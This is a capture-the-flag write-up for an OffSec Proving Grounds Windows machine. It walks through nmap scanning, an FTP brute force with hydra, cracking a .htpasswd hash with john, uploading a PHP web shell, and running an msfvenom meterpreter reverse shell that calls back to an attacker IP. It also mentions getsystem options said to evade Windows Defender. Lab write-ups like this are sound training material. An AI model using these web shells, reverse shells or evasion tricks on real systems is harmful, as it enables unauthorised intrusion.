Windows, PG Practise; IP address: 192.168.200.46; Difficulty: Intermediate
TL;DR
- The ftp server allows anonymous login, grab the potential account name and try to brute for it
- A service account in Windows always has a SeImpersonationPrivilege, use that well.
Initial Enumeration
Scan the full ports, kali > sudo nmap -sS 192.168.200.46 -p- -vv
Now scan for the port version, kali > sudo nmap -sS 192.168.200.46 -p21,242,3145,3389 -vv
- 21, allows anonymous login
- some files on the server are listed
- 242, is an apache server
- 3145, is an admin server for zFTPServer running on port 21
- 3389, is obviously running a default remote desktop server
Let’s start to enumerate port 21
- anonymous login is not a problem, and the direction is the same as NMAP told us.
- At the /accounts directory, there are three username exposed, Offsec, anonymous, admin
- Trouble is we couldn’t view them. and nothing for us to see in backup folder
- Nothing else for us to enumerate in port 21.
Port 242 might be interesting, let’s have a look
- It is asking for the login credential, we don’t have it yet, so let it go.
Port 3145 is asking for the FTP credential as well, maybe we could try to brute force that too.
Gathering all the information we have so far, we know three possible account names
- anonymous
- Offsec
- admin
Let’s try from admin first, there is a good wordlist for default FTP credential login https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt save the file as userpass, and then run the follow command
- hydra -C ./userpass ftp://192.168.200.46 -V -I
- Found that admin:admin is a valid login credential
For port 242, 3145, 3389, brute force will not work for all three usernames.
Initial Foothold
Log in to Port 21 with credential admin:admin, we found following files
- hello.txt and hello.php are two files I uploaded there to test if we have uploading permission, turns out we have.
- The key file is .htpasswd. Remember that when we went to port 242, we were stopped immediately by http basic authentication. The password is stored at .htpasswd
- we could grab it by issuing command ftp > get .htpasswd
- Found the following content in .htpasswd
- This is obviously a hash value, worry not, we got john the ripper on our side
- copy the hash value after offsec: to a file called hash, and then run the following command
- john hash –wordlist=/usr/share/wordlists/rockyou.txt
- Got the password elite
- john hash –wordlist=/usr/share/wordlists/rockyou.txt
- Using the credential, we could view the page at port 242, but nothing is there. Which is enough for us.
- Remember we uploaded a text file named hello.txt to the ftp port with admin:admin credential, let’s see if we could view it at the browser
- Yes we can, now things become very easy.
We need a local file inclusion exploit and then get our initial foothold
- Upload a php file with following content to the ftp server, I name it hello.php
- <?php echo shell_exec($_GET[‘cmd’]); ?>
- Ready a meterpreter reverse shell, has to be x86 version, I tried x64, not receiving the signal.
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.170 LPORT=443 -f exe -o tcp443.exe
- Upload the meterpreter shell tcp443.exe to the FTP server as well, and go to following URL
- http://192.168.200.46:242/hello.php?cmd=tcp_x86_443.exe
- Here we got the signal from the target host.
The local.txt flag is at c:\users\apache\desktop, not gonna show it here.
Privilege Escalation
Privilege Escalation is actually is easiest part of this vuln box
- Using whoami /priv showed that we have SeImpersonatePrivilege.
- If you’re using the meterpreter shell like I did, then you only need to run
- getsystem -t 6
side notes: I couldn’t remember which option is for SeImpersonationPrivilege escalation, so I tried -t 5 and -t 4, both failed. I know that using getsystem only will try each option once and then grant me the privilege, but I try to avoid it because this technique will get detected by the windows defender easily. However if you have specified the option with flag -t, then windows defender won’t see it. At least not the case 2 years ago. Not sure how it goes these days. Anyway, remember that if you have hacked a service account on a windows machine, it will probably have a SeImpersonatePrivilege set, which will make things very easy.
After I completed this machine, I tried to look at the intended solution, obviously it’s very interesting and worth learning.
Mission Accomplished!